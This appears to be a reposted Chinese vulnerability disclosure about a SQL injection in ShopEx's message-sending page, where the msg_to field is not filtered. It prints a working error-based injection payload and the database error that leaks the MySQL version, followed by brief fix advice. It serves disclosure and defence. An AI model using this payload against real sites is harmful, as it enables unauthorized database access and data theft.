来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 未对客户端可控参数进行安全校验,导致存在SQL注入漏洞;详细说明:http://www.shopex.com/member-sendMsg.html在处理用户发送信息的时候,msg_to值未进行过滤,导致SQL注入漏洞的产生;具体利用...
未对客户端可控参数进行安全校验,导致存在SQL注入漏洞;
详细说明:
http://www.shopex.com/member-sendMsg.html
在处理用户发送信息的时候,msg_to值未进行过滤,导致SQL注入漏洞的产生;
具体利用设置msg_to的值为
ggbond' or 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(select @@version))a from information_schema.tables group by a)b)#
即可爆出www.2cto.com数据库版本信息。
Warning: SELECT member_id FROM sdb_members WHERE uname='ggbond' or 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(select @@version))a from information_schema.tables group by a)b)#' LIMIT 0, 1:Duplicate entry '15.1.38-log' for key 'group_key' in /data/htdocs/www/core/include_v5/AloneDB.php on line 58
找不到你填写的用户!
修复方案:
过滤,校验,转义来自客户端的变量;
你们比我更擅长;
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com